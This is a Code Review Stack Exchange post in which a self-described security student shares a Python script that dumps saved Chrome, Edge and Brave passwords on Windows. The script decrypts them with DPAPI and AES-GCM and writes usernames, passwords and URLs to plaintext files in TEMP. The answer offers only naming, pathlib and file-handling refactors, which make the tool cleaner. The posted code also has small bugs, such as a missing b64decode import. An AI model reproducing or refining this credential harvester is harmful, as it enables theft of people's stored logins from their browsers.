# script to recover browser passwords

Tags: python, beginner, python-3.x, security

basically i am new to python lookin for any bad practices done down there in my script, any ways to shrink the code and increase efficiency

```
import json, os, win32crypt, shutil, sqlite3
from Crypto.Cipher import AES

tmp = os.getenv('TEMP')
usa = os.environ['USERPROFILE']

triple = False
both = False
edb = usa + os.sep + r'AppData\Local\Microsoft\Edge\User Data\Default\Login Data'
cdb = usa + os.sep + r'AppData\Local\Google\Chrome\User Data\Default\Login Data'
bdb = usa + os.sep + r'AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Login Data'

if os.path.exists(edb) and os.path.exists(bdb):
    both = True
if both and os.path.exists(bdb):
    triple = True
ckey = usa + os.sep + r'AppData\Local\Google\Chrome\User Data\Local State'
ekey = usa + os.sep + r'AppData\Local\Microsoft\Edge\User Data\Local State'
bkey = usa + os.sep + r'AppData\Local\BraveSoftware\Brave-Browser\User Data\Local State'


def dec(pwd, key):
    initv = pwd[3:15]
    block = pwd[15:]
    cphr = AES.new(key, AES.MODE_GCM, initv)
    realAssPass = cphr.decrypt(block)
    realAssPass = realAssPass[:-16].decode()
    return realAssPass


l = ["LOGIN.db", "LOGIN.txt", "LOGINe.db", "LOGINe.txt", "LOGINb.db", "LOGINb.txt"]


def main(db=cdb, keylocation=ckey, dbName=l[0], fName=l[1]):
    cp = shutil.copy2(db, tmp + os.sep + fr"{dbName}")
    f = open(keylocation, "r", encoding="utf-8")
    local_state = f.read()
    local_state = json.loads(local_state)
    maKey = b64decode(local_state['os_crypt']['encrypted_key'])
    maKey = maKey[5:]
    maKey = win32crypt.CryptUnprotectData(maKey)[1]
    # gotTheKeyHoe, TimeToDeCode
    conn = sqlite3.connect(tmp + os.sep + fr"{dbName}")
    cursor = conn.cursor()
    cursor.execute("SELECT action_url, username_value, password_value FROM logins")
    f2 = open(tmp + os.sep + fr"{fName}", "w")
    for i in cursor.fetchall():
        site = i[0]
        user = i[1]
        pas = i[2]
        final = dec(pas, maKey)
        x = f"[...] User: {user}, Pass: {final}, URl: {site}"
        f2.write('\n' + x)
    f2.close()


if triple:
    main()
    main(bdb, bkey, l[4], l[5])
    main(edb, ekey, l[2], l[3])


elif both:
    main()
    main(edb, ekey, l[2], l[3])

else:
    try:
        main()
    except:
        main(db=edb, keylocation=ekey)
```

FYI i am studyin cybersec and came across a script to recover browser passwords, decided to write one myself

Comment: This seems very hardcoded, especially your paths. How would this run on another persons system with a different file structure or even worse Linux? Disregarding the serverstuff I would look into [pathlib](https://docs.python.org/3/library/pathlib.html) and particular `Path`.

Comment: @N3buchadnezzar it can never work on linux. thats one reason i posted it for a solution

Comment: I [changed the title](https://codereview.stackexchange.com/posts/264094/revisions#rev-body-51d43f6f-0f30-460a-8233-4cf991a04ee8) so that it describes what the code does per [site goals](https://codereview.stackexchange.com/questions/how-to-ask): "_State what your code does in your title, not your main concerns about it._". Feel free to [edit] and give it a different title if there is something more appropriate.

Answer (score 2):

There are two things that can greatly improve your code's readability.

First one is, using better names. Making a variable name short makes it easier to write it. However, code is more often read than written. Hence, its better to give variables a more meaningful name. For example:

```py
chrome_db_path
edge_db_path
breave_db_path
chrome_key_path
...
```

And also, as @N3buchadnezzar suggested, you could use `pathlib`:

```py
import os
from pathlib import Path

tmp_dir = Path(os.getenv('TEMP'))
user_profile_dir = Path(os.environ['USERPROFILE'])

app_data_local_dir = user_profile_dir / 'AppData/Local'

LOGIN_DATA_PATH = 'User Data/Default/Login Data'
LOCAL_STATE_PATH = 'User Data/Local State'

chrome_dir = app_data_local_dir / 'Google/Chrome'
edge_dir = app_data_local_dir / 'Microsoft/Edge'
brave_dir = app_data_local_dir / 'BraveSoftware/Brave-Browser'

chrome_db_path = chrome_dir  / LOGIN_DATA_PATH
edge_db_path = edge_dir / LOGIN_DATA_PATH
brave_db_path = brave_dir  / LOGIN_DATA_PATH

chrome_key_path = chrome_dir / LOCAL_STATE_PATH
...

chrome_and_edge_exist = chrome_db_path.exists() and edge_db_path.exists()
chrome_edge_and_brave_exist = chrome_and_edge_exist and brave_db_path.exists()
...
```

Also, I would recommend you to use the `with` statement, to ensure files are always closed:

```py
try:
 my_file = open(my_file_path)
 ...
finally:
 my_file.close()
```

Would be equivalent to:

```py
with open(my_file_path) as my_file:
 ...
```

Using `pathlib`:

```py
my_file_path = Path('some/path')
with my_file_path.open() as my_file:
 ...
```

Edit:

After re-reading your code, it seems like a list is not the best data structure for the files used by the different browsers. A dict will be more suitable and readable:

```py
browser_files = {
  'chrome': {
    'db_file': 'LOGIN.db',
    'output_file': 'LOGIN.txt'
  },
  'edge': {
    'db_file': 'LOGINe.db',
    'output_file': 'LOGINe.txt'
  },
  ...
}

chrome_files = browser_files['chrome']
main(chrome_db_path, chrome_key_path, chrome_files['db_file'], chrome_files['db_file'])
...
```